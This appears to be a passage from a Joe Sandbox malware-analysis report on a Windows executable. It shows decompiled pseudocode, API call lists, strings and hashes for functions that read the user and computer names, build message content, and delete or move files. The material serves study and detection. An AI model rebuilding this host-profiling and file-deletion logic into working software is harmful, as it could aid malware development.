							 *(_t313 - 4) = 0xc;
							L0043DE26();
							 *(_t313 - 4) = 0xd;
							_t196 = E00429029(_t313 - 0x1c, 0xe059);
							_push(_t194);
							_push(_t196);
							_t197 = _t313 - 0x30;
							 *(_t313 - 4) = 0xe;
							_push(_t197);
							L0043E282();
							_push(", ");
							_push(_t197);
							_t198 = _t313 - 0x24;
							 *(_t313 - 4) = 0xf;
							_push(_t198);
							L0043DE20();
							_push(_t193);
							_push(_t198);
							_t199 = _t313 - 0x10;
							 *(_t313 - 4) = 0x10;
							_push(_t199);
							L0043E282();
							_push(_t199);
							 *(_t313 - 4) = 0x11;
							L0043DFCA();
							 *(_t313 - 4) = 0x10;
							L0043DD36();
							 *(_t313 - 4) = 0xf;
							L0043DD36();
							 *(_t313 - 4) = 0xe;
							L0043DD36();
							 *(_t313 - 4) = 0xd;
							L0043DD36();
							 *(_t313 - 4) = 0xc;
							L0043DD36();
							 *(_t313 - 4) = 5;
							L0043DD36();
							_t298 =  *0x4550cc; // 0x0
							_t259 = 0x1f;
							 *(_t313 - 0x1cc) = _t298;
							memset(_t313 - 0x1cb, 0, _t259 << 2);
							asm("stosw");
							asm("stosb");
							_push(0x1f);
							 *(_t313 - 0x14c) = _t298;
							memset(_t313 - 0x14b, 0, 0 << 2);
							_t317 = _t315 + 0x18;
							asm("stosw");
							asm("stosb");
							 *(_t313 - 0x2c) = 0x80;
							GetUserNameA(_t313 - 0x1cc, _t313 - 0x2c);
							 *(_t313 - 0x2c) = 0x80;
							_t209 = GetComputerNameA(_t313 - 0x14c, _t313 - 0x2c);
							_push(1);
							_pop(0);
							_push(0x80);
							_push(0x29);
							L0043E34E();
							_push(0x80);
							_push(0x5c);
							 *(_t313 - 4) = 0x12;
							L0043E34E();
							 *(_t313 - 0x28) = _t209;
							_t210 = _t313 - 0x14c;
							_push(_t210);
							 *(_t313 - 4) = 0x13;
							L0043DE26();
							_push(_t210);
							_t211 = _t313 - 0x24;
							_push(0x453480);
							_push(_t211);
							 *(_t313 - 4) = 0x14;
							L0043E168();
							_push( *(_t313 - 0x28));
							 *(_t313 - 4) = 0x15;
							_push(_t211);
							_t212 = _t313 - 0x30;
							_push(_t212);
							L0043E282();
							 *(_t313 - 4) = 0x16;
							_push(_t313 - 0x1cc);
							_push(_t212);
							_t213 = _t313 - 0x1c;
							_push(_t213);
							L0043DE20();
							_push(_t209);
							_push(_t213);
							_t214 = _t313 - 0x20;
							 *(_t313 - 4) = 0x17;
							_push(_t214);
							L0043E282();
							_push(_t214);
							 *(_t313 - 4) = 0x18;
							L0043DE1A();
							 *(_t313 - 4) = 0x17;
							L0043DD36();
							 *(_t313 - 4) = 0x16;
							L0043DD36();
							 *(_t313 - 4) = 0x15;
							L0043DD36();
							 *(_t313 - 4) = 0x14;
							L0043DD36();
							 *(_t313 - 4) = 0x13;
							L0043DD36();
							 *(_t313 - 4) = 0x12;
							L0043DD36();
							 *(_t313 - 4) = 5;
							L0043DD36();
							E00410EF3(_t313 - 0x2fc);
							 *(_t313 - 4) = 0x19;
							L0043DDD8();
							 *(_t313 - 4) = 0x1a;
							if( *((intOrPtr*)(_t313 - 0x308)) == 0) {
								_t224 = E00429029(_t313 - 0x14, 0xe05a);
								_push( *((intOrPtr*)(_t313 - 0x300)));
								 *(_t313 - 4) = 0x1b;
								_push(_t313 - 0x14c);
								_push(_t313 - 0x1cc);
								_push( *((intOrPtr*)(_t313 - 0x304)));
								_push( *_t224);
								_push(_t313 + 8);
								L0043E174();
								_t317 = _t317 + 0x18;
								 *(_t313 - 4) = 0x1a;
								L0043DD36();
							}
							if( *((intOrPtr*)(_t313 - 0x308)) == 0) {
								_t220 = E00429029(_t313 - 0x14, 0xe05f);
								_push(_t313 - 0x14c);
								_push(_t313 - 0x1cc);
								 *(_t313 - 4) = 0x1c;
								_push( *((intOrPtr*)(_t313 - 0x304)));
								_push( *((intOrPtr*)(_t313 - 0x300)));
								_push( *_t220);
								_push(_t313 + 8);
								L0043E174();
								 *(_t313 - 4) = 0x1a;
								L0043DD36();
							}
							_push(_t313 + 8);
							L004128F9(_t313 + 8, 0, _t313 - 0x29c, _t298, 0);
							_t217 = _t313 - 0x29c;
							_push(_t313 - 0x29c);
							L00412FF7(_t313 - 0x29c, 0, _t313 - 0x64, _t298, 0);
							 *(_t313 - 4) = 0x19;
							L0043DD36();
							 *(_t313 - 4) = 5;
							L004110CC(_t313 - 0x29c, 0, _t313 - 0x2fc, _t298, 0);
							 *(_t313 - 4) = 3;
							L00411F64(_t217, 0, _t313 - 0x29c, _t298, 0);
							 *(_t313 - 4) = 0;
							L00412C30(_t217, 0, _t313 - 0x64, _t298, 0);
							 *(_t313 - 4) = 0x1d;
						} else {
							 *(_t313 - 4) = 0;
							L00412C30(_t177, 0, _t313 - 0x64, _t297, _t307);
							 *(_t313 - 4) = 4;
							goto L2;
						}
					} else {
						 *(_t313 - 4) = 2;
						goto L2;
					}
				} else {
					 *(_t313 - 4) = 1;
					L2:
				}
				L0043DD36();
				 *(_t313 - 4) =  *(_t313 - 4) | 0xffffffff;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t313 - 0xc));
				return 0;
			}

0x00426ffb
0x00427005
0x0042700b
0x0042700c
0x00427015
0x00427022
0x00427025
0x0042703b
0x00427049
0x0042704e
0x00427055
0x0042705e
0x00427062
0x00427069
0x0042706a
0x00427070
0x00427076
0x00427077
0x0042707e
0x0042709b
0x004270a9
0x004270aa
0x004270ae
0x004270b9
0x004270ba
0x004270be
0x004270c3
0x004270c4
0x004270cb
0x004270cf
0x004270d7
0x004270db
0x004270e3
0x004270e7
0x004270ef
0x004270f3
0x00427101
0x00427102
0x0042710d
0x0042710e
0x00427112
0x0042711e
0x00427122
0x0042712a
0x0042712e
0x00427136
0x0042713a
0x00427142
0x00427146
0x0042714e
0x0042714f
0x0042715a
0x0042715b
0x00427176
0x0042717c
0x0042718f
0x00427198
0x0042719e
0x004271a7
0x004271a8
0x004271af
0x004271b8
0x004271b9
0x004271bd
0x004271cd
0x004271d1
0x004271d8
0x004271d9
0x004271da
0x004271dd
0x004271e1
0x004271e2
0x004271e7
0x004271ec
0x004271ed
0x004271f0
0x004271f4
0x004271f5
0x004271fa
0x004271fb
0x004271fc
0x004271ff
0x00427203
0x00427204
0x00427209
0x00427210
0x00427214
0x0042721c
0x00427220
0x00427228
0x0042722c
0x00427234
0x00427238
0x00427240
0x00427244
0x0042724c
0x00427250
0x00427258
0x0042725c
0x00427261
0x00427269
0x00427272
0x00427278
0x0042727a
0x0042727c
0x0042727d
0x0042727f
0x0042728e
0x0042728e
0x00427290
0x00427292
0x004272a3
0x004272a6
0x004272af
0x004272ba
0x004272c0
0x004272c5
0x004272c6
0x004272c7
0x004272c9
0x004272d0
0x004272d1
0x004272d6
0x004272da
0x004272df
0x004272e2
0x004272eb
0x004272ec
0x004272f0
0x004272f5
0x004272f6
0x004272f9
0x004272fe
0x004272ff
0x00427303
0x00427308
0x0042730b
0x0042730f
0x00427310
0x00427313
0x00427314
0x0042731f
0x00427323
0x00427324
0x00427325
0x00427328
0x00427329
0x0042732e
0x0042732f
0x00427330
0x00427333
0x00427337
0x00427338
0x0042733d
0x00427344
0x00427348
0x00427350
0x00427354
0x0042735c
0x00427360
0x00427368
0x0042736c
0x00427371
0x00427378
0x00427380
0x00427384
0x0042738c
0x00427390
0x00427398
0x0042739c
0x004273a7
0x004273af
0x004273b3
0x004273be
0x004273c3
0x004273ce
0x004273d5
0x004273e3
0x004273e7
0x004273ee
0x004273ef
0x004273f5
0x004273f9
0x004273fa
0x004273ff
0x00427405
0x00427409
0x00427409
0x00427414
0x0042741f
0x0042742e
0x00427435
0x00427436
0x0042743a
0x00427440
0x00427446
0x0042744a
0x0042744b
0x00427456
0x0042745a
0x0042745a
0x00427468
0x00427469
0x0042746e
0x00427477
0x00427478
0x00427480
0x00427484
0x0042748f
0x00427493
0x0042749e
0x004274a2
0x004274aa
0x004274ad
0x004274b2
0x00427080
0x00427083
0x00427086
0x0042708b
0x00000000
0x0042708b
0x0042703d
0x0042703d
0x00000000
0x0042703d
0x00427027
0x00427027
0x0042702e
0x0042702e
0x004274bf
0x004274c4
0x004274ce
0x004274da
0x004274e2

APIs

__EH_prolog.LIBCMT ref: 00426FFB

Part of subcall function 004274E3: __EH_prolog.LIBCMT ref: 004274E8
Part of subcall function 004274E3: #535.MFC42(?,?,?,?,?,0042701A,?), ref: 00427517
Part of subcall function 004274E3: #535.MFC42(?,?,?,?,?,?,0042701A,?), ref: 0042752D

#537.MFC42(?), ref: 004270AE
#800.MFC42 ref: 004270DB
#800.MFC42 ref: 004270E7
#800.MFC42 ref: 004270F3
#537.MFC42(?), ref: 00427102
#800.MFC42(00000000,?), ref: 0042712E
#800.MFC42(00000000,?), ref: 0042713A
#800.MFC42(00000000,?), ref: 00427146
#3811.MFC42(?,00000000,?), ref: 0042714F
#6673.MFC42(?,?,00000000,?), ref: 0042715B
GetTimeFormatA.KERNEL32(00000400,00000002,?,00000000,?,00000032,?,?,00000000,?), ref: 0042717C
GetDateFormatA.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00427198
#537.MFC42(?), ref: 004271A8
#537.MFC42(?,?), ref: 004271BD
#922.MFC42(?,00000000,00000000,?,?), ref: 004271E2
#924.MFC42(?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 004271F5
#922.MFC42(?,00000000,00000000,?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 00427204
#858.MFC42(00000000,?,00000000,00000000,?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 00427214
#800.MFC42(00000000,?,00000000,00000000,?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 00427220
#800.MFC42(00000000,?,00000000,00000000,?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 0042722C
#800.MFC42(00000000,?,00000000,00000000,?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 00427238
#800.MFC42(00000000,?,00000000,00000000,?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 00427244
#800.MFC42(00000000,?,00000000,00000000,?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 00427250
#800.MFC42(00000000,?,00000000,00000000,?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 0042725C
GetUserNameA.ADVAPI32(?,?), ref: 004272A6
GetComputerNameA.KERNEL32 ref: 004272BA
#536.MFC42(00000029,00000001), ref: 004272C9
#536.MFC42(0000005C,00000001,00000029,00000001), ref: 004272DA
#537.MFC42(?,0000005C,00000001,00000029,00000001), ref: 004272F0
#926.MFC42(?,00453480,00000000,?,0000005C,00000001,00000029,00000001), ref: 00427303
#922.MFC42(?,00000000,?,?,00453480,00000000,?,0000005C,00000001,00000029,00000001), ref: 00427314
#924.MFC42(?,00000000,?,?,00000000,?,?,00453480,00000000,?,0000005C,00000001,00000029,00000001), ref: 00427329
#922.MFC42(?,00000000,00000000,?,00000000,?,?,00000000,?,?,00453480,00000000,?,0000005C,00000001,00000029), ref: 00427338
#939.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,?,?,00453480,00000000,?,0000005C,00000001), ref: 00427348
#800.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,?,?,00453480,00000000,?,0000005C,00000001), ref: 00427354
#800.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,?,?,00453480,00000000,?,0000005C,00000001), ref: 00427360
#800.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,?,?,00453480,00000000,?,0000005C,00000001), ref: 0042736C
#800.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,?,?,00453480,00000000,?,0000005C,00000001), ref: 00427378
#800.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,?,?,00453480,00000000,?,0000005C,00000001), ref: 00427384
#800.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,?,?,00453480,00000000,?,0000005C,00000001), ref: 00427390
#800.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,?,?,00453480,00000000,?,0000005C,00000001), ref: 0042739C

Part of subcall function 00410EF3: __EH_prolog.LIBCMT ref: 00410EF8
Part of subcall function 00410EF3: #540.MFC42 ref: 00410F0B
Part of subcall function 00410EF3: #540.MFC42 ref: 00410F18
Part of subcall function 00410EF3: #537.MFC42(text/plain), ref: 00410F29
Part of subcall function 00410EF3: #537.MFC42(iso-8859-1,text/plain), ref: 00410F3A
Part of subcall function 00410EF3: #540.MFC42(iso-8859-1,text/plain), ref: 00410F46
Part of subcall function 00410EF3: #540.MFC42(iso-8859-1,text/plain), ref: 00410F52
Part of subcall function 00410EF3: #540.MFC42(iso-8859-1,text/plain), ref: 00410F5E
Part of subcall function 00410EF3: #540.MFC42(iso-8859-1,text/plain), ref: 00410F6A
Part of subcall function 00410EF3: #540.MFC42 ref: 00410F9A
Part of subcall function 00410EF3: UuidCreate.RPCRT4 ref: 00410FB4
Part of subcall function 00410EF3: UuidToStringA.RPCRT4(?,?), ref: 00410FC5
Part of subcall function 00410EF3: #860.MFC42(?,?,?,?,?,?,?,?), ref: 00410FD0
Part of subcall function 00410EF3: RpcStringFreeA.RPCRT4(?), ref: 00410FD9

#540.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,?,?,00453480,00000000,?,0000005C,00000001), ref: 004273B3
#2818.MFC42(?,?,?,?,?,?,?,00000000,00000000,?,00000000,?,?,00000000,?,?), ref: 004273FA
#800.MFC42 ref: 00427409
#2818.MFC42(?,?,?,?,?,?,?,00000000,00000000,?,00000000,?,?,00000000,?,?), ref: 0042744B
#800.MFC42 ref: 0042745A
#800.MFC42 ref: 00427484

Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A

#800.MFC42 ref: 004274BF
#800.MFC42 ref: 004274CE

Strings

5-D, xrefs: 00426FF6

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#537#540$#922$H_prologString$#2818#535#536#924FormatNameUuid$#1168#3811#6673#858#860#926#939ComputerCreateDateFreeLoadTimeUser
String ID: 5-D
API String ID: 2983505076-2356814095
Opcode ID: 443957831526f93c60cbc5b9592fc5e517bf6ae7b6713f599016f16c159e9bf0
Instruction ID: 7f0afa281f7a9448ea938780668a47e9d00c9a4003bbe7e2d1c4d2ad1e05b918
Opcode Fuzzy Hash: 443957831526f93c60cbc5b9592fc5e517bf6ae7b6713f599016f16c159e9bf0
Instruction Fuzzy Hash: 7EE18C71C0129DEADF15EBA5C945BDEBBB8AF29308F10449EE105B3182DB781B48DB25

Uniqueness

Uniqueness Score: -1.00%

Function 00424001, Relevance: 89.6, APIs: 48, Strings: 3, Instructions: 312fileCOMMON

Download Yara Rule

APIs

#537.MFC42 ref: 00424003
#5683.MFC42(0000005C), ref: 00424011
#4277.MFC42(?,00000001,0000005C), ref: 0042401F
#858.MFC42(00000000,?,00000001,0000005C), ref: 0042402C
#800.MFC42(00000000,?,00000001,0000005C), ref: 00424038
#800.MFC42 ref: 00424058
#3790.MFC42(?,?), ref: 004240A7
#540.MFC42(?,?), ref: 00424105
#2818.MFC42(?,?,?,?,?), ref: 00424149
#800.MFC42 ref: 00424158
#924.MFC42(?,004558C8,pk.bin), ref: 004241AC
#800.MFC42(?,004558C8,pk.bin), ref: 004241C5
DeleteFileA.KERNEL32(?), ref: 004241F4
DeleteFileA.KERNEL32(?), ref: 00424217
#537.MFC42(?), ref: 00424225
#5683.MFC42(0000005C,?), ref: 00424233
#4129.MFC42(?,00000001,0000005C,?), ref: 00424241
#941.MFC42(th_,?,00000001,0000005C,?), ref: 00424252
#5683.MFC42(0000005C,th_,?,00000001,0000005C,?), ref: 0042425C
#4277.MFC42(?,00000001,0000005C,th_,?,00000001,0000005C,?), ref: 0042426A
#939.MFC42(00000000,?,00000001,0000005C,th_,?,00000001,0000005C,?), ref: 00424277
#800.MFC42(00000000,?,00000001,0000005C,th_,?,00000001,0000005C,?), ref: 00424283
#5683.MFC42(0000002E,00000000,?,00000001,0000005C,th_,?,00000001,0000005C,?), ref: 0042428D
#4129.MFC42(?,00000000,0000002E,00000000,?,00000001,0000005C,th_,?,00000001,0000005C,?), ref: 0042429A
#858.MFC42(00000000,?,00000000,0000002E,00000000,?,00000001,0000005C,th_,?,00000001,0000005C,?), ref: 004242A7
#800.MFC42(00000000,?,00000000,0000002E,00000000,?,00000001,0000005C,th_,?,00000001,0000005C,?), ref: 004242B3
DeleteFileA.KERNEL32(?,00000000,?,00000000,0000002E,00000000,?,00000001,0000005C,th_,?,00000001,0000005C,?), ref: 004242BB
#800.MFC42 ref: 004242C4
#800.MFC42 ref: 004242D0
#537.MFC42(?), ref: 00424300
#5683.MFC42(0000002E,?), ref: 0042430E
#4129.MFC42(?,00000000,0000002E,?), ref: 0042431B
#858.MFC42(00000000,?,00000000,0000002E,?), ref: 00424328
#800.MFC42(00000000,?,00000000,0000002E,?), ref: 00424334
MoveFileA.KERNEL32 ref: 00424346
#800.MFC42 ref: 00424353
DeleteFileA.KERNEL32(?), ref: 0042436E
DeleteFileA.KERNEL32(?), ref: 00424373
DeleteFileA.KERNEL32(?), ref: 00424378
DeleteFileA.KERNEL32(?), ref: 00424385
#800.MFC42 ref: 00424394
#800.MFC42 ref: 004243AC
#800.MFC42 ref: 004243E8
#800.MFC42 ref: 004243F4
#800.MFC42 ref: 00424400
#800.MFC42 ref: 0042440C
#800.MFC42 ref: 00424417
#800.MFC42 ref: 00424423

Strings

th_, xrefs: 00424246
!, xrefs: 0042434F
pk.bin, xrefs: 00424198

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$File$Delete$#5683$#4129#537#858$#4277$#2818#3790#540#924#939#941Move
String ID: !$pk.bin$th_
API String ID: 1982520284-890230901
Opcode ID: b23c7ce43ee635d1412bbe1d5acf9bc8deccf275408fc8fdf1b6bf42c8cac3f3
Instruction ID: 48a4b5b5f3631110273161b13b6e66cca7681c4f7b3feb1bbde68e5369fc9437
Opcode Fuzzy Hash: b23c7ce43ee635d1412bbe1d5acf9bc8deccf275408fc8fdf1b6bf42c8cac3f3
Instruction Fuzzy Hash: 26D1C431C0128DEECF15EFE5D895AEEBBB4AF19304F00449EE50667282DB785B48CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00429FDA, Relevance: 84.3, APIs: 44, Strings: 4, Instructions: 349
stringCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00429FDA(void* __ecx, void* __eflags) {
				void* _t160;
				void* _t163;
				short _t168;
				void* _t186;
				void* _t198;
				void* _t201;
				CHAR* _t202;
				void* _t203;
				void* _t208;
				intOrPtr* _t215;
				intOrPtr _t216;
				CHAR** _t217;
				void* _t220;
				CHAR** _t291;
				void* _t292;
				void* _t294;
				intOrPtr _t297;

				E0043E4E0(0x443180, _t292);
				E0043E690(0x20b0, __ecx);
				L0043E486();
				 *(_t292 - 4) = 0;
				L0043DDDE();
				 *(_t292 - 4) = 1;
				L0043DDD8();
				 *(_t292 - 0x3c) =  *(_t292 - 0x3c) | 0xffffffff;
				_push(0);
				 *(_t292 - 4) = 2;
				 *((intOrPtr*)(_t292 - 0x48)) = 0x445490;
				 *((intOrPtr*)(_t292 - 0x40)) = 0;
				L0043DDD2();
				 *((intOrPtr*)(_t292 - 0x34)) = 0x449630;
				 *((intOrPtr*)(_t292 - 0x30)) = 0;
				 *((intOrPtr*)(_t292 - 0x24)) = 0;
				 *((intOrPtr*)(_t292 - 0x28)) = 0;
				 *((intOrPtr*)(_t292 - 0x2c)) = 0;
				_t160 = _t292 - 0x48;
				_push(_t160);
				_push(0);
				_push( *((intOrPtr*)(_t292 + 8)));
				 *(_t292 - 4) = 4;
				L0043E480();
				if(_t160 == 0) {
					L33:
					 *(_t292 - 4) = 3;
					E0042ACEC(_t292 - 0x34);
					 *((intOrPtr*)(_t292 - 0x48)) = 0x445490;
					 *(_t292 - 4) = 5;
					L34:
					L0043DD36();
					 *(_t292 - 4) =  *(_t292 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t292 - 0x48)) = 0x44547c;
					L0043E46E();
					 *[fs:0x0] =  *((intOrPtr*)(_t292 - 0xc));
					return 0;
				}
				L0043E2A6();
				if(_t160 == 0) {
					goto L33;
				}
				L0043DDD8();
				_t163 = _t292 - 0x14;
				_push(_t163);
				 *(_t292 - 4) = 6;
				L0043E4B6();
				if(_t163 == 0) {
					L16:
					L0043E474();
					memset(_t292 - 0x88, 0, 0x10);
					memset(_t292 - 0xa8, 0, 0x10);
					 *(_t292 - 0x88) = 0x7bc;
					 *(_t292 - 0xa8) = 0x7e4;
					_t168 = 1;
					 *((short*)(_t292 - 0xa6)) = _t168;
					 *((short*)(_t292 - 0xa2)) = _t168;
					 *((short*)(_t292 - 0x86)) = _t168;
					 *((short*)(_t292 - 0x82)) = _t168;
					L0043DDD8();
					 *(_t292 - 4) = 8;
					L0043DDD8();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t292 - 4) = 9;
					asm("movsd");
					memset(_t292 - 0xb8, 0, 0x10);
					_t297 = _t294 + 0x24;
					 *((short*)(_t292 - 0x90)) = 0x17;
					 *((short*)(_t292 - 0x8e)) = 0x3b;
					 *((short*)(_t292 - 0x8c)) = 0x3b;
					 *((intOrPtr*)(_t292 + 8)) = 0;
					if( *((intOrPtr*)(_t292 - 0x2c)) - 1 < 0) {
						L30:
						 *(_t292 - 4) = 8;
						if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0xc)))) - 8)) != 0) {
							L0043DD36();
							 *(_t292 - 4) = 6;
							L0043DD36();
							 *(_t292 - 4) = 4;
							L0043DD36();
							 *(_t292 - 4) = 3;
							E0042ACEC(_t292 - 0x34);
							 *((intOrPtr*)(_t292 - 0x48)) = 0x445490;
							_push(1);
							 *(_t292 - 4) = 0xe;
							_pop(0);
						} else {
							L0043DD36();
							 *(_t292 - 4) = 6;
							L0043DD36();
							 *(_t292 - 4) = 4;
							L0043DD36();
							 *(_t292 - 4) = 3;
							E0042ACEC(_t292 - 0x34);
							 *((intOrPtr*)(_t292 - 0x48)) = 0x445490;
							 *(_t292 - 4) = 0xd;
						}
						goto L34;
					}
					 *((intOrPtr*)(_t292 - 0x18)) = 0;
					do {
						_push(_t292 - 0x78);
						L0043E4A4();
						L0043DE32();
						_push(_t292 - 0x10);
						 *((intOrPtr*)(_t292 - 0x54)) = _t297;
						_push(0xffffffff);
						L0043E4BC();
						_t256 = E0042ACDC(_t292 - 0x34,  *((intOrPtr*)(_t292 + 8)));
						if(E0042A478(_t256, _t292 - 0x88) != 0) {
							_push(_t256);
							 *((intOrPtr*)(_t292 - 0x54)) = _t297;
							_push(0xffffffff);
							L0043E4BC();
							_t256 = E0042ACDC(_t292 - 0x34,  *((intOrPtr*)(_t292 + 8)));
							_t198 = E004249CF(_t197, _t292 - 0x98);
							_t311 = _t198;
							if(_t198 != 0) {
								_push( *((intOrPtr*)(_t292 + 8)));
								_push(_t292 - 0x34);
								_push(_t292 - 0x20);
								_t201 = E00429920(_t311);
								_t297 = _t297 + 0xc;
								_push(_t201);
								 *(_t292 - 4) = 0xa;
								L0043DFCA();
								_t256 = _t292 - 0x20;
								 *(_t292 - 4) = 9;
								L0043DD36();
							}
						}
						if( *((intOrPtr*)( *((intOrPtr*)(_t292 - 0x10)) - 8)) == 0) {
							L0043DE32();
						} else {
							_push( *((intOrPtr*)(E00429098(_t256, _t292 - 0x4c, _t292 - 0x78))));
							 *(_t292 - 4) = 0xb;
							_push("<H1>&nbsp;%s</H1>");
							_push(_t292 - 0x1c);
							L0043E174();
							_t297 = _t297 + 0xc;
							 *(_t292 - 4) = 9;
							L0043DD36();
						}
						if( *((intOrPtr*)(_t292 - 0xb2)) !=  *((intOrPtr*)(_t292 - 0x72)) ||  *((intOrPtr*)(_t292 - 0xb6)) !=  *((intOrPtr*)(_t292 - 0x76)) ||  *(_t292 - 0xb8) !=  *((intOrPtr*)(_t292 - 0x78))) {
							_push(_t292 - 0x10);
							_push(_t292 - 0x1c);
							_t186 = _t292 - 0x50;
							_push(_t186);
							L0043E282();
							_push(_t186);
							 *(_t292 - 4) = 0xc;
							L0043DE1A();
							 *(_t292 - 4) = 9;
							L0043DD36();
						} else {
							_push(_t292 - 0x10);
							L0043DE1A();
						}
						asm("movsd");
						 *((intOrPtr*)(_t292 + 8)) =  *((intOrPtr*)(_t292 + 8)) + 1;
						 *((intOrPtr*)(_t292 - 0x18)) =  *((intOrPtr*)(_t292 - 0x18)) + 0x1004;
						asm("movsd");
						asm("movsd");
						asm("movsd");
					} while ( *((intOrPtr*)(_t292 + 8)) <=  *((intOrPtr*)(_t292 - 0x2c)) - 1);
					goto L30;
				} else {
					do {
						_t202 =  *(_t292 - 0x14);
						if( *((intOrPtr*)(_t202 - 8)) == 0) {
							goto L15;
						}
						lstrcpynA(_t292 - 0x20bc, _t202, 0xfff);
						E00429085(_t292 - 0x20bc);
						_t208 = _t292 - 0x14;
						_push(_t208);
						L0043E4B6();
						if(_t208 == 0) {
							goto L16;
						}
						lstrcpynA(_t292 - 0x8b8,  *(_t292 - 0x14), 0x7ff);
						E00429085(_t292 - 0x8b8);
						_push(_t292 - 0x8b8);
						_t215 =  *((intOrPtr*)(E00409643(_t292 + 8)));
						 *(_t292 - 4) = 7;
						if(_t215 == 0) {
							_t216 = 0;
							__eflags = 0;
						} else {
							_t216 =  *_t215;
						}
						_t217 = E00429215(_t292 - 0x18, _t216, _t292 - 0x18);
						_t291 = _t217;
						 *(_t292 - 4) = 6;
						_t275 =  *((intOrPtr*)(_t292 + 8));
						if( *((intOrPtr*)(_t292 + 8)) != 0) {
							_t217 = E004096DD(_t275);
							 *((intOrPtr*)(_t292 + 8)) = 0;
						}
						if(_t291 != 0) {
							L0043E144();
							lstrcpyA(_t292 - 0x8b8,  *_t217);
							L0043DD36();
							__imp__#6( *((intOrPtr*)(_t292 - 0x18)),  *((intOrPtr*)(_t292 - 0x18)));
						}
						_t220 = E0042987E(_t292 - 0x20bc, _t292 - 0x10bc);
						_t307 = _t220;
						if(_t220 != 0) {
							E0042ACAF(_t292 - 0x34, _t307, _t292 - 0x10bc);
						}
						L15:
						_t203 = _t292 - 0x14;
						_push(_t203);
						L0043E4B6();
					} while (_t203 != 0);
					goto L16;
				}
			}

0x00429fdf
0x00429fe9
0x00429ff4
0x00429ffe
0x0042a001
0x0042a009
0x0042a00d
0x0042a012
